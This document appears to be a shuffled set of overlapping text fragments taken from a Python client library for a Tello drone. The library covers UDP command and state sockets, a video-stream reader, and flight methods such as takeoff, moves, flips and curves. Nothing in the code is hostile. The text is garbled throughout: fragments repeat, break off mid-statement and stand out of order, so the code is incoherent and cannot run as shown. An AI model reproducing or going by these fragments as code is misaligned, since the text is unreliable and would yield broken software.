('192.168.10.1', 8889) self.enter_command_mode() self.video_client = None if video:", "command mode or open the video stream. \"\"\" self.command_timeout =", "mode. Args: local_port (int): port of local machine for receiving", "enter command mode or open the video stream. \"\"\" self.command_timeout", "\"\"\" return self.send_command('left {}'.format(x), with_return) def move_right(self, x, with_return=False): \"\"\"", "[20, 500] param z: int, [20, 500] param speed: int,", "in data.decode('utf-8').split(';') if ':' in item} def pop(self): return self.response", "None self.lock = threading.RLock() self.thread = threading.Thread(target=self._update_thread) self.thread.daemon = daemon", "\"\"\"Connects to Tello in command mode. Args: local_port (int): port", "is not available') while self.video_client.empty(): pass return self.video_client.pop() def enter_command_mode(self):", "self.send_command('flip f', with_return) def flip_backward(self, with_return=False): \"\"\" param with_return: bool", "_update_thread(self): while True: ok, frame = self.video.read() if ok: with", "z, speed, with_return=False): \"\"\" param x: int, [20, 500] param", "return: 'ok' or 'error' \"\"\" return self.send_command('curve {} {} {}", "def set_speed(self, speed, with_return=False): \"\"\" param speed: int, [10-100] param", "with_return: bool return: 'ok' or 'error' \"\"\" return self.send_command('forward {}'.format(x),", "Tello? Raises: RuntimeError: If the Tello rejects the attempt to", "return: int \"\"\" return self.get('baro?') def get_imu_acceleration(self): \"\"\" return: list(int)", "def take_off(self): \"\"\" return: 'ok' or 'error' \"\"\" return self.send_command('takeoff')", "state from Tello? video (bool): receive video from Tello? Raises:", "wait for a response of command. state (bool): receive state", "return self.get('acceleration?', split=True) def get_tof_height(self): \"\"\" return: int, [10, 400];", "self.response = self.response, None return response def empty(self): with self.lock:", "return self.send_command('flip f', with_return) def flip_backward(self, with_return=False): \"\"\" param with_return:", "= {} self.lock = threading.RLock() def recv(self, data): with self.lock:", "seconds. \"\"\" self.response_client.pop() self.response_client.socket.sendto(command.encode('utf-8'), self.tello_address) if not with_return: return st", "as a thread, sets self.response to whatever the Tello last", "[-179, 179]] \"\"\" return self.get('attitude?', split=True) def get_absolute_height(self): \"\"\" return:", "up_down_velocity, rotate_velocity), with_return) def get(self, command, split=False): \"\"\" param command", "return st = time.time() while self.response_client.empty(): if time.time() - st", "def pop(self): pass def empty(self): pass class Command(Response): def __init__(self):", "return self.frame is None def pop(self): with self.lock: frame, self.frame", "self.send_command('forward {}'.format(x), with_return) def move_backward(self, x, with_return=False): \"\"\" param x:", "socket import threading class Response(object): def __init__(self): pass def recv(self,", "daemon=True): self.video = cv2.VideoCapture('udp://@0.0.0.0:11111') if not self.video.isOpened(): raise RuntimeError('Failed to", "is exceeded before a response is received, a RuntimeError exception", "with_return) def get(self, command, split=False): \"\"\" param command param split:", "\"\"\" param command param split: bool, multiple values? return: int", "class Command(Response): def __init__(self): super(Command, self).__init__() self.response = None self.lock", "\"\"\" self.command_timeout = command_timeout self.response_client = Client(local_port, 1024, True, Command())", "return: int, [10, 3000] \"\"\" return self.get('height?') def get_temperature(self): \"\"\"", "{} {} {} {}'.format(x1, y1, z1, x2, y2, z2, speed),", "\"\"\" return: int \"\"\" return self.get('time?') def get_relative_height(self): \"\"\" return:", "return self.send_command('right {}'.format(x), with_return) def move_forward(self, x, with_return=False): \"\"\" param", "daemon, response): self.response = response self.buffer_size = buffer_size self.socket =", "self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) self.socket.bind(('', local_port)) self.receive_thread = threading.Thread(target=self._receive_thread) self.receive_thread.daemon", "daemon self.thread.start() def __del__(self): self.video.release() def _update_thread(self): while True: ok,", "100] param up_down_velocity: int, [-100, 100] param rotate_velocity: int, [-100,", "State()) if state else None self.tello_address = ('192.168.10.1', 8889) self.enter_command_mode()", "bool return: 'ok' or 'error' \"\"\" return self.send_command('back {}'.format(x), with_return)", "list(int) \"\"\" result = self.send_command(command) if split: return [int(x) for", "{} {} {} {} {} {}'.format(x1, y1, z1, x2, y2,", "if split: return [int(x) for x in result.split(' ')] else:", "response self.buffer_size = buffer_size self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) self.socket.bind(('', local_port))", "self.response = response self.buffer_size = buffer_size self.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)", "try: self.response.recv(self.socket.recv(self.buffer_size)) except Exception as e: print(e) break def empty(self):", "def emergency_shutdown(self): \"\"\" return: 'ok' or 'error' \"\"\" return self.send_command('emergency')", "split: return [int(x) for x in result.split(' ')] else: return", "values? return: int or list(int) \"\"\" result = self.send_command(command) if", "def move_forward(self, x, with_return=False): \"\"\" param x: int, [20, 500]", "response): self.response = response self.buffer_size = buffer_size self.socket = socket.socket(socket.AF_INET,", "self.frame is None def pop(self): with self.lock: frame, self.frame =", "if not with_return: return st = time.time() while self.response_client.empty(): if", "if state else None self.tello_address = ('192.168.10.1', 8889) self.enter_command_mode() self.video_client", "raise RuntimeError('No response to command') return self.response_client.pop() def state(self): return", "received, a RuntimeError exception is raised. Args: command (str): Command", "Raises: RuntimeError: If no response is received within self.timeout seconds.", "self.video_client = Video(True) def send_command(self, command, with_return=True): \"\"\"Sends a command", "up_down_velocity, rotate_velocity, with_return=False): \"\"\" param left_right_velocity: int, [-100, 100] param", "bool return: 'ok' or 'error' \"\"\" return self.send_command('down {}'.format(x), with_return)", "def get_absolute_height(self): \"\"\" return: int \"\"\" return self.get('baro?') def get_imu_acceleration(self):", "param command param split: bool, multiple values? return: int or", "the local socket.\"\"\" self.socket.close() def _receive_thread(self): \"\"\"Listens for responses from", "not self.video.isOpened(): raise RuntimeError('Failed to connect to Tello') self.frame =", "video stream. \"\"\" self.command_timeout = command_timeout self.response_client = Client(local_port, 1024,", "waits for a response. If self.command_timeout is exceeded before a", "self.send_command('right {}'.format(x), with_return) def move_forward(self, x, with_return=False): \"\"\" param x:", "__init__(self, daemon=True): self.video = cv2.VideoCapture('udp://@0.0.0.0:11111') if not self.video.isOpened(): raise RuntimeError('Failed", "a command to the Tello and waits for a response.", "\"\"\" return self.send_command('flip f', with_return) def flip_backward(self, with_return=False): \"\"\" param", "or 'error' \"\"\" return self.send_command('curve {} {} {} {} {}", "param forward_backward_velocity: int, [-100, 100] param up_down_velocity: int, [-100, 100]", "def __init__(self, daemon=True): self.video = cv2.VideoCapture('udp://@0.0.0.0:11111') if not self.video.isOpened(): raise", "RuntimeError: If no response is received within self.timeout seconds. \"\"\"", "attempt to enter command mode or open the video stream.", "x, y, z, speed, with_return=False): \"\"\" param x: int, [20,", "{} {} {} {} {}'.format(x1, y1, z1, x2, y2, z2,", "returned. \"\"\" while True: try: self.response.recv(self.socket.recv(self.buffer_size)) except Exception as e:", "def move_left(self, x, with_return=False): \"\"\" param x: int, [20, 500]", "local_port, buffer_size, daemon, response): self.response = response self.buffer_size = buffer_size", "param with_return: bool return: 'ok' or 'error' \"\"\" return self.send_command('rc", "the attempt to enter command mode or open the video", "received within self.timeout seconds. \"\"\" self.response_client.pop() self.response_client.socket.sendto(command.encode('utf-8'), self.tello_address) if not", "def set_remote_controller_command(self, left_right_velocity, forward_backward_velocity, up_down_velocity, rotate_velocity, with_return=False): \"\"\" param left_right_velocity:", "for x in result.split(' ')] else: return int(result) def get_speed(self):", "bool return: 'ok' or 'error' \"\"\" return self.send_command('left {}'.format(x), with_return)", "= None self.lock = threading.RLock() def recv(self, data): with self.lock:", "'ok' or 'error' \"\"\" return self.send_command('takeoff') def land(self): \"\"\" return:", "\"\"\" self.response_client.pop() self.response_client.socket.sendto(command.encode('utf-8'), self.tello_address) if not with_return: return st =", "open_video_stream(self): if self.send_command('streamon') != 'ok': raise RuntimeError('Tello rejected to open", "raised. Args: command (str): Command to send. Returns: str: Response", "import cv2 import time import socket import threading class Response(object):", "else: return int(result) def get_speed(self): \"\"\" return: int, [10, 100]", "z1, x2, y2, z2, speed), with_return) def set_speed(self, speed, with_return=False):", "def __del__(self): \"\"\"Closes the local socket.\"\"\" self.socket.close() def _receive_thread(self): \"\"\"Listens", "self.video_client = None if video: self.open_video_stream() self.video_client = Video(True) def", "param with_return: bool return: 'ok' or 'error' \"\"\" return self.send_command('up", "open the video stream') def close_video_stream(self): \"\"\" return: 'ok' or", "\"\"\" return: int \"\"\" return self.get('baro?') def get_imu_acceleration(self): \"\"\" return:", "!= 'ok': raise RuntimeError('Tello rejected the attempt to enter command", "def _receive_thread(self): \"\"\"Listens for responses from the Tello. Runs as", "'ok' or 'error' \"\"\" return self.send_command('cw {}'.format(x), with_return) def rotate_counter_clockwise(self,", "{item.split(':')[0]:float(item.split(':')[1]) for item in data.decode('utf-8').split(';') if ':' in item} def", "def pop(self): return self.response.pop() class Video(object): def __init__(self, daemon=True): self.video", "e: print(e) break def empty(self): return self.response.empty() def pop(self): return", "or 'error' \"\"\" return self.send_command('streamoff') def emergency_shutdown(self): \"\"\" return: 'ok'", "Exception as e: print(e) break def empty(self): return self.response.empty() def", "pass def recv(self, data): pass def pop(self): pass def empty(self):", "enter_command_mode(self): if self.send_command('command') != 'ok': raise RuntimeError('Tello rejected the attempt", "result.split(' ')] else: return int(result) def get_speed(self): \"\"\" return: int,", "return: int, [10, 100] \"\"\" return self.get('speed?') def get_battery(self): \"\"\"", "'error' \"\"\" return self.send_command('flip b', with_return) def goto(self, x, y,", "1024, True, Command()) self.state_client = Client(8890, 1024, True, State()) if", "RuntimeError('No response to command') return self.response_client.pop() def state(self): return self.state_client.pop()", "local socket.\"\"\" self.socket.close() def _receive_thread(self): \"\"\"Listens for responses from the", "raise RuntimeError('Tello rejected to open the video stream') def close_video_stream(self):", "state=True, video=True): \"\"\"Connects to Tello in command mode. Args: local_port", "{} {} {} {} {} {} {}'.format(x1, y1, z1, x2,", "list(int), [[-89, 89], [-179, 179], [-179, 179]] \"\"\" return self.get('attitude?',", "Tello? video (bool): receive video from Tello? Raises: RuntimeError: If", "threading.RLock() self.thread = threading.Thread(target=self._update_thread) self.thread.daemon = daemon self.thread.start() def __del__(self):", "to Tello in command mode. Args: local_port (int): port of", "except Exception as e: print(e) break def empty(self): return self.response.empty()", "def empty(self): with self.lock: return self.frame is None def pop(self):", "state (bool): receive state from Tello? video (bool): receive video", "self.receive_thread.start() def __del__(self): \"\"\"Closes the local socket.\"\"\" self.socket.close() def _receive_thread(self):", "if self.send_command('command') != 'ok': raise RuntimeError('Tello rejected the attempt to", "return: 'ok' or 'error' \"\"\" return self.send_command('emergency') def move_up(self, x,", "= time.time() while self.response_client.empty(): if time.time() - st >= self.command_timeout:", "machine for receiving command response. command_timeout (float): seconds to wait", "500] param with_return: bool return: 'ok' or 'error' \"\"\" return", "x, with_return=False): \"\"\" param x: int, [1, 3600] param with_return:", "flip_left(self, with_return=False): \"\"\" param with_return: bool return: 'ok' or 'error'", "None def read_frame(self): if self.video_client is None: raise RuntimeError('Video is", "(x1, y1, z1), (x2, y2, z2) with speed param x1,", "self.get('time?') def get_relative_height(self): \"\"\" return: int, [10, 3000] \"\"\" return", "with_return: bool return: 'ok' or 'error' \"\"\" return self.send_command('back {}'.format(x),", "return self.response.empty() def pop(self): return self.response.pop() class Video(object): def __init__(self,", "self.video_client is None: raise RuntimeError('Video is not available') while self.video_client.empty():", "'error' \"\"\" return self.send_command('left {}'.format(x), with_return) def move_right(self, x, with_return=False):", "return frame class Tello(object): def __init__(self, local_port=9999, command_timeout=0.35, state=True, video=True):", "curve defined by (0, 0, 0), (x1, y1, z1), (x2,", "100] param rotate_velocity: int, [-100, 100] param with_return: bool return:", "stream. \"\"\" self.command_timeout = command_timeout self.response_client = Client(local_port, 1024, True,", "self.get('attitude?', split=True) def get_absolute_height(self): \"\"\" return: int \"\"\" return self.get('baro?')", "Tello') self.frame = None self.lock = threading.RLock() self.thread = threading.Thread(target=self._update_thread)", "data): with self.lock: self.response = {item.split(':')[0]:float(item.split(':')[1]) for item in data.decode('utf-8').split(';')", "def __init__(self): super(State, self).__init__() self.response = {} self.lock = threading.RLock()", "response of command. state (bool): receive state from Tello? video", "def rotate_counter_clockwise(self, x, with_return=False): \"\"\" param x: int, [1, 3600]", "[-100, 100] param rotate_velocity: int, [-100, 100] param with_return: bool", "self.video.read() if ok: with self.lock: self.frame = frame def empty(self):", "bool return: 'ok' or 'error' \"\"\" return self.send_command('rc {} {}", "self.get('battery?') def get_flight_time(self): \"\"\" return: int \"\"\" return self.get('time?') def", "\"\"\" return: int, [10, 3000] \"\"\" return self.get('height?') def get_temperature(self):", "\"\"\" return self.get('speed?') def get_battery(self): \"\"\" return: int, [0, 100]", "class Response(object): def __init__(self): pass def recv(self, data): pass def", "'ok' or 'error' \"\"\" return self.send_command('right {}'.format(x), with_return) def move_forward(self,", "\"\"\" return self.send_command('back {}'.format(x), with_return) def rotate_clockwise(self, x, with_return=False): \"\"\"", "0, 0), (x1, y1, z1), (x2, y2, z2) with speed", "= Client(local_port, 1024, True, Command()) self.state_client = Client(8890, 1024, True,", "State(Response): def __init__(self): super(State, self).__init__() self.response = {} self.lock =", "':' in item} def pop(self): return self.response def empty(self): return", "empty(self): return self.response.empty() def pop(self): return self.response.pop() class Video(object): def", "self.response.pop() class Video(object): def __init__(self, daemon=True): self.video = cv2.VideoCapture('udp://@0.0.0.0:11111') if", "or 'error' \"\"\" return self.send_command('flip r', with_return) def flip_forward(self, with_return=False):", "{}'.format(left_right_velocity, forward_backward_velocity, up_down_velocity, rotate_velocity), with_return) def get(self, command, split=False): \"\"\"", "If the Tello rejects the attempt to enter command mode", "with_return=True): \"\"\"Sends a command to the Tello and waits for", "'error' \"\"\" return self.send_command('land') def open_video_stream(self): if self.send_command('streamon') != 'ok':", "'ok' or 'error' \"\"\" return self.send_command('flip f', with_return) def flip_backward(self,", "'ok' or 'error' \"\"\" return self.send_command('flip l', with_return) def flip_right(self,", "__init__(self): pass def recv(self, data): pass def pop(self): pass def", "def get_speed(self): \"\"\" return: int, [10, 100] \"\"\" return self.get('speed?')", "before a response is received, a RuntimeError exception is raised.", "responses from the Tello. Runs as a thread, sets self.response", "exceeded before a response is received, a RuntimeError exception is", "or open the video stream. \"\"\" self.command_timeout = command_timeout self.response_client", "return self.send_command('ccw {}'.format(x), with_return) def flip_left(self, with_return=False): \"\"\" param with_return:", "return: 'ok' or 'error' \"\"\" return self.send_command('go {} {} {}", "500] param speed: int, [10-60] param with_return: bool return: 'ok'", "or list(int) \"\"\" result = self.send_command(command) if split: return [int(x)", "in result.split(' ')] else: return int(result) def get_speed(self): \"\"\" return:", "with_return) def flip_right(self, with_return=False): \"\"\" param with_return: bool return: 'ok'", "if ok: with self.lock: self.frame = frame def empty(self): with", "def move_down(self, x, with_return=False): \"\"\" param x: int, [20, 500]", "')] else: return int(result) def get_speed(self): \"\"\" return: int, [10,", "\"\"\" return self.get('attitude?', split=True) def get_absolute_height(self): \"\"\" return: int \"\"\"", "self.frame = self.frame, None return frame class Tello(object): def __init__(self,", "Client(local_port, 1024, True, Command()) self.state_client = Client(8890, 1024, True, State())", "with_return=False): \"\"\" param x: int, [1, 3600] param with_return: bool", "self.response = data.decode('utf-8') def pop(self): with self.lock: response, self.response =", "int, [10, 400]; 6553: out of bounds \"\"\" return self.get('tof?')", "= threading.RLock() self.thread = threading.Thread(target=self._update_thread) self.thread.daemon = daemon self.thread.start() def", "def move_right(self, x, with_return=False): \"\"\" param x: int, [20, 500]", "rotate_velocity), with_return) def get(self, command, split=False): \"\"\" param command param", "return: 'ok' or 'error' \"\"\" return self.send_command('up {}'.format(x), with_return) def", "if self.state_client else None def read_frame(self): if self.video_client is None:", "local_port (int): port of local machine for receiving command response.", "(bool): receive state from Tello? video (bool): receive video from", "a response of command. state (bool): receive state from Tello?", "def __del__(self): self.video.release() def _update_thread(self): while True: ok, frame =", "data.decode('utf-8') def pop(self): with self.lock: response, self.response = self.response, None", "whatever the Tello last returned. \"\"\" while True: try: self.response.recv(self.socket.recv(self.buffer_size))", "__init__(self, local_port=9999, command_timeout=0.35, state=True, video=True): \"\"\"Connects to Tello in command", "with_return) def move_backward(self, x, with_return=False): \"\"\" param x: int, [20,", "to Tello') self.frame = None self.lock = threading.RLock() self.thread =", "y1, z1, x2, y2, z2, speed), with_return) def set_speed(self, speed,", "self.get('speed?') def get_battery(self): \"\"\" return: int, [0, 100] \"\"\" return", "Response(object): def __init__(self): pass def recv(self, data): pass def pop(self):", "int, [-500, 500] param z1, z2: int, [-500, 500] param", "[-500, 500] param speed: int, [10-60] param with_return: bool return:", "while self.video_client.empty(): pass return self.video_client.pop() def enter_command_mode(self): if self.send_command('command') !=", "self.lock = threading.RLock() def recv(self, data): with self.lock: self.response =", "self.response.empty() def pop(self): return self.response.pop() class Video(object): def __init__(self, daemon=True):", "\"\"\"Sends a command to the Tello and waits for a", "{} self.lock = threading.RLock() def recv(self, data): with self.lock: self.response", "command, split=False): \"\"\" param command param split: bool, multiple values?", "time.time() while self.response_client.empty(): if time.time() - st >= self.command_timeout: raise", "def goto(self, x, y, z, speed, with_return=False): \"\"\" param x:", "self.get('acceleration?', split=True) def get_tof_height(self): \"\"\" return: int, [10, 400]; 6553:", "{} {} {} {}'.format(x, y, z, speed), with_return) def goto_curve(self,", "int, [10, 100] \"\"\" return self.get('speed?') def get_battery(self): \"\"\" return:", "item in data.decode('utf-8').split(';') if ':' in item} def pop(self): return", "self.send_command('ccw {}'.format(x), with_return) def flip_left(self, with_return=False): \"\"\" param with_return: bool", "3000] \"\"\" return self.get('height?') def get_temperature(self): \"\"\" return: int, [0,", "the Tello last returned. \"\"\" while True: try: self.response.recv(self.socket.recv(self.buffer_size)) except", "'error' \"\"\" return self.send_command('flip f', with_return) def flip_backward(self, with_return=False): \"\"\"", "return: 'ok' or 'error' \"\"\" return self.send_command('flip b', with_return) def", "\"\"\" return: 'ok' or 'error' \"\"\" return self.send_command('streamoff') def emergency_shutdown(self):", "command. state (bool): receive state from Tello? video (bool): receive", "import time import socket import threading class Response(object): def __init__(self):", "get_speed(self): \"\"\" return: int, [10, 100] \"\"\" return self.get('speed?') def", "Tello(object): def __init__(self, local_port=9999, command_timeout=0.35, state=True, video=True): \"\"\"Connects to Tello", "_receive_thread(self): \"\"\"Listens for responses from the Tello. Runs as a", "500] param z: int, [20, 500] param speed: int, [10-100]", "int, [0, 90] \"\"\" return self.get('temp?') def get_imu_pose(self): \"\"\"[pitch, roll,", "int \"\"\" return self.get('baro?') def get_imu_acceleration(self): \"\"\" return: list(int) \"\"\"", "RuntimeError: If the Tello rejects the attempt to enter command", "'error' \"\"\" return self.send_command('forward {}'.format(x), with_return) def move_backward(self, x, with_return=False):", "with_return) def flip_left(self, with_return=False): \"\"\" param with_return: bool return: 'ok'", "return: list(int) \"\"\" return self.get('acceleration?', split=True) def get_tof_height(self): \"\"\" return:", "data.decode('utf-8').split(';') if ':' in item} def pop(self): return self.response def", "return self.send_command('curve {} {} {} {} {} {} {}'.format(x1, y1,", "bool return: 'ok' or 'error' \"\"\" return self.send_command('cw {}'.format(x), with_return)", "local_port)) self.receive_thread = threading.Thread(target=self._receive_thread) self.receive_thread.daemon = daemon self.receive_thread.start() def __del__(self):", "[10, 100] \"\"\" return self.get('speed?') def get_battery(self): \"\"\" return: int,", "for responses from the Tello. Runs as a thread, sets", "return self.send_command('takeoff') def land(self): \"\"\" return: 'ok' or 'error' \"\"\"", "rotate_velocity, with_return=False): \"\"\" param left_right_velocity: int, [-100, 100] param forward_backward_velocity:", "else None self.tello_address = ('192.168.10.1', 8889) self.enter_command_mode() self.video_client = None", "the video stream') def close_video_stream(self): \"\"\" return: 'ok' or 'error'", "with_return) def goto(self, x, y, z, speed, with_return=False): \"\"\" param", "'ok' or 'error' \"\"\" return self.send_command('curve {} {} {} {}", "seconds to wait for a response of command. state (bool):", "\"\"\" return: int, [10, 100] \"\"\" return self.get('speed?') def get_battery(self):", "return self.get('speed?') def get_battery(self): \"\"\" return: int, [0, 100] \"\"\"", "raise RuntimeError('Tello rejected the attempt to enter command mode') def", "RuntimeError('Video is not available') while self.video_client.empty(): pass return self.video_client.pop() def", "self.response_client.empty(): if time.time() - st >= self.command_timeout: raise RuntimeError('No response", "bool return: 'ok' or 'error' \"\"\" return self.send_command('forward {}'.format(x), with_return)", "[-500, 500] param z1, z2: int, [-500, 500] param speed:", "class Video(object): def __init__(self, daemon=True): self.video = cv2.VideoCapture('udp://@0.0.0.0:11111') if not", "param x: int, [20, 500] param y: int, [20, 500]", "[-179, 179], [-179, 179]] \"\"\" return self.get('attitude?', split=True) def get_absolute_height(self):", "x: int, [20, 500] param with_return: bool return: 'ok' or", "Command to send. Returns: str: Response from Tello. Raises: RuntimeError:", "command_timeout self.response_client = Client(local_port, 1024, True, Command()) self.state_client = Client(8890,", "and waits for a response. If self.command_timeout is exceeded before", "int, [10-100] param with_return: bool return: 'ok' or 'error' \"\"\"", "self.send_command('curve {} {} {} {} {} {} {}'.format(x1, y1, z1,", "from Tello? Raises: RuntimeError: If the Tello rejects the attempt", "or 'error' \"\"\" return self.send_command('speed {}'.format(speed), with_return) def set_remote_controller_command(self, left_right_velocity,", "int, [-100, 100] param rotate_velocity: int, [-100, 100] param with_return:", "Runs as a thread, sets self.response to whatever the Tello", "or 'error' \"\"\" return self.send_command('rc {} {} {} {}'.format(left_right_velocity, forward_backward_velocity,", "with_return=False): \"\"\"fly a curve defined by (0, 0, 0), (x1,", "or 'error' \"\"\" return self.send_command('flip l', with_return) def flip_right(self, with_return=False):", "Tello and waits for a response. If self.command_timeout is exceeded", "get_tof_height(self): \"\"\" return: int, [10, 400]; 6553: out of bounds", "with_return=False): \"\"\" param x: int, [20, 500] param y: int,", "pop(self): return self.response def empty(self): return False class Client(object): def", "100] param with_return: bool return: 'ok' or 'error' \"\"\" return", "None return frame class Tello(object): def __init__(self, local_port=9999, command_timeout=0.35, state=True,", "\"\"\" param left_right_velocity: int, [-100, 100] param forward_backward_velocity: int, [-100,", "[[-89, 89], [-179, 179], [-179, 179]] \"\"\" return self.get('attitude?', split=True)", "to enter command mode') def take_off(self): \"\"\" return: 'ok' or", "[10-100] param with_return: bool return: 'ok' or 'error' \"\"\" return", "(int): port of local machine for receiving command response. command_timeout", "return: 'ok' or 'error' \"\"\" return self.send_command('rc {} {} {}", "\"\"\"Listens for responses from the Tello. Runs as a thread,", "x2: int, [-500, 500] param y1, y2: int, [-500, 500]", "int, [10, 3000] \"\"\" return self.get('height?') def get_temperature(self): \"\"\" return:", "False class Client(object): def __init__(self, local_port, buffer_size, daemon, response): self.response", "RuntimeError('Tello rejected the attempt to enter command mode') def take_off(self):", "with_return: bool return: 'ok' or 'error' \"\"\" return self.send_command('flip f',", "with_return: bool return: 'ok' or 'error' \"\"\" return self.send_command('curve {}", "def __init__(self): super(Command, self).__init__() self.response = None self.lock = threading.RLock()", "param rotate_velocity: int, [-100, 100] param with_return: bool return: 'ok'", "list(int) \"\"\" return self.get('acceleration?', split=True) def get_tof_height(self): \"\"\" return: int,", "or 'error' \"\"\" return self.send_command('go {} {} {} {}'.format(x, y,", "'ok' or 'error' \"\"\" return self.send_command('land') def open_video_stream(self): if self.send_command('streamon')", "speed), with_return) def set_speed(self, speed, with_return=False): \"\"\" param speed: int,", "self.state_client else None def read_frame(self): if self.video_client is None: raise", "return self.get('baro?') def get_imu_acceleration(self): \"\"\" return: list(int) \"\"\" return self.get('acceleration?',", "= None self.lock = threading.RLock() self.thread = threading.Thread(target=self._update_thread) self.thread.daemon =", "self.response to whatever the Tello last returned. \"\"\" while True:", "self.thread = threading.Thread(target=self._update_thread) self.thread.daemon = daemon self.thread.start() def __del__(self): self.video.release()", "None def pop(self): with self.lock: frame, self.frame = self.frame, None", "attempt to enter command mode') def take_off(self): \"\"\" return: 'ok'", "[-100, 100] param up_down_velocity: int, [-100, 100] param rotate_velocity: int,", "Command(Response): def __init__(self): super(Command, self).__init__() self.response = None self.lock =", "sets self.response to whatever the Tello last returned. \"\"\" while", "move_up(self, x, with_return=False): \"\"\" param x: int, [20, 500] param", "\"\"\" return self.get('battery?') def get_flight_time(self): \"\"\" return: int \"\"\" return", "or 'error' \"\"\" return self.send_command('down {}'.format(x), with_return) def move_left(self, x,", "{}'.format(x), with_return) def move_left(self, x, with_return=False): \"\"\" param x: int,", "within self.timeout seconds. \"\"\" self.response_client.pop() self.response_client.socket.sendto(command.encode('utf-8'), self.tello_address) if not with_return:", "'error' \"\"\" return self.send_command('takeoff') def land(self): \"\"\" return: 'ok' or", "param with_return: bool return: 'ok' or 'error' \"\"\" return self.send_command('forward", "Client(8890, 1024, True, State()) if state else None self.tello_address =", "with_return: bool return: 'ok' or 'error' \"\"\" return self.send_command('rc {}", "with_return) def rotate_counter_clockwise(self, x, with_return=False): \"\"\" param x: int, [1,", "with_return=False): \"\"\" param with_return: bool return: 'ok' or 'error' \"\"\"", "int, [20, 500] param speed: int, [10-100] param with_return: bool", "super(State, self).__init__() self.response = {} self.lock = threading.RLock() def recv(self,", "'ok': raise RuntimeError('Tello rejected the attempt to enter command mode')", "'error' \"\"\" return self.send_command('down {}'.format(x), with_return) def move_left(self, x, with_return=False):", "command mode. Args: local_port (int): port of local machine for", "if time.time() - st >= self.command_timeout: raise RuntimeError('No response to", "'error' \"\"\" return self.send_command('back {}'.format(x), with_return) def rotate_clockwise(self, x, with_return=False):", "forward_backward_velocity, up_down_velocity, rotate_velocity), with_return) def get(self, command, split=False): \"\"\" param", "split: bool, multiple values? return: int or list(int) \"\"\" result", "ok: with self.lock: self.frame = frame def empty(self): with self.lock:", "response is received, a RuntimeError exception is raised. Args: command", "179], [-179, 179]] \"\"\" return self.get('attitude?', split=True) def get_absolute_height(self): \"\"\"", "return: 'ok' or 'error' \"\"\" return self.send_command('ccw {}'.format(x), with_return) def", "self.thread.daemon = daemon self.thread.start() def __del__(self): self.video.release() def _update_thread(self): while", "89], [-179, 179], [-179, 179]] \"\"\" return self.get('attitude?', split=True) def", "\"\"\" while True: try: self.response.recv(self.socket.recv(self.buffer_size)) except Exception as e: print(e)", "self.enter_command_mode() self.video_client = None if video: self.open_video_stream() self.video_client = Video(True)", "return [int(x) for x in result.split(' ')] else: return int(result)", "time import socket import threading class Response(object): def __init__(self): pass", "socket.SOCK_DGRAM) self.socket.bind(('', local_port)) self.receive_thread = threading.Thread(target=self._receive_thread) self.receive_thread.daemon = daemon self.receive_thread.start()", "3600] param with_return: bool return: 'ok' or 'error' \"\"\" return", "return self.get('battery?') def get_flight_time(self): \"\"\" return: int \"\"\" return self.get('time?')", "return self.response_client.pop() def state(self): return self.state_client.pop() if self.state_client else None", "with self.lock: return self.frame is None def pop(self): with self.lock:", "self.lock: response, self.response = self.response, None return response def empty(self):", "result = self.send_command(command) if split: return [int(x) for x in", "command mode') def take_off(self): \"\"\" return: 'ok' or 'error' \"\"\"", "empty(self): with self.lock: return self.frame is None def pop(self): with", "send. Returns: str: Response from Tello. Raises: RuntimeError: If no", "response. command_timeout (float): seconds to wait for a response of", "'ok' or 'error' \"\"\" return self.send_command('emergency') def move_up(self, x, with_return=False):", "param split: bool, multiple values? return: int or list(int) \"\"\"", "import socket import threading class Response(object): def __init__(self): pass def", "self).__init__() self.response = {} self.lock = threading.RLock() def recv(self, data):", "'ok': raise RuntimeError('Tello rejected to open the video stream') def", "with_return: bool return: 'ok' or 'error' \"\"\" return self.send_command('right {}'.format(x),", "get_relative_height(self): \"\"\" return: int, [10, 3000] \"\"\" return self.get('height?') def", "with_return: bool return: 'ok' or 'error' \"\"\" return self.send_command('cw {}'.format(x),", "with_return) def move_left(self, x, with_return=False): \"\"\" param x: int, [20,", "'error' \"\"\" return self.send_command('flip l', with_return) def flip_right(self, with_return=False): \"\"\"", "or 'error' \"\"\" return self.send_command('forward {}'.format(x), with_return) def move_backward(self, x,", "x, with_return=False): \"\"\" param x: int, [20, 500] param with_return:", "l', with_return) def flip_right(self, with_return=False): \"\"\" param with_return: bool return:", "- st >= self.command_timeout: raise RuntimeError('No response to command') return", "None: raise RuntimeError('Video is not available') while self.video_client.empty(): pass return", "return: 'ok' or 'error' \"\"\" return self.send_command('left {}'.format(x), with_return) def", "set_speed(self, speed, with_return=False): \"\"\" param speed: int, [10-100] param with_return:", "no response is received within self.timeout seconds. \"\"\" self.response_client.pop() self.response_client.socket.sendto(command.encode('utf-8'),", "return: 'ok' or 'error' \"\"\" return self.send_command('forward {}'.format(x), with_return) def", "return self.video_client.pop() def enter_command_mode(self): if self.send_command('command') != 'ok': raise RuntimeError('Tello", "{} {} {}'.format(x1, y1, z1, x2, y2, z2, speed), with_return)", "return self.send_command('speed {}'.format(speed), with_return) def set_remote_controller_command(self, left_right_velocity, forward_backward_velocity, up_down_velocity, rotate_velocity,", "the attempt to enter command mode') def take_off(self): \"\"\" return:", "def recv(self, data): pass def pop(self): pass def empty(self): pass", "def move_backward(self, x, with_return=False): \"\"\" param x: int, [20, 500]", "pop(self): with self.lock: response, self.response = self.response, None return response", "move_forward(self, x, with_return=False): \"\"\" param x: int, [20, 500] param", "command_timeout=0.35, state=True, video=True): \"\"\"Connects to Tello in command mode. Args:", "param with_return: bool return: 'ok' or 'error' \"\"\" return self.send_command('curve", "while True: try: self.response.recv(self.socket.recv(self.buffer_size)) except Exception as e: print(e) break", "return self.get('attitude?', split=True) def get_absolute_height(self): \"\"\" return: int \"\"\" return", "class State(Response): def __init__(self): super(State, self).__init__() self.response = {} self.lock", "return self.send_command('land') def open_video_stream(self): if self.send_command('streamon') != 'ok': raise RuntimeError('Tello", "command_timeout (float): seconds to wait for a response of command.", "self.send_command('flip r', with_return) def flip_forward(self, with_return=False): \"\"\" param with_return: bool", "True, Command()) self.state_client = Client(8890, 1024, True, State()) if state", "y, z, speed), with_return) def goto_curve(self, x1, y1, z1, x2,", "threading.RLock() def recv(self, data): with self.lock: self.response = {item.split(':')[0]:float(item.split(':')[1]) for", "{}'.format(x), with_return) def flip_left(self, with_return=False): \"\"\" param with_return: bool return:", "with_return) def move_forward(self, x, 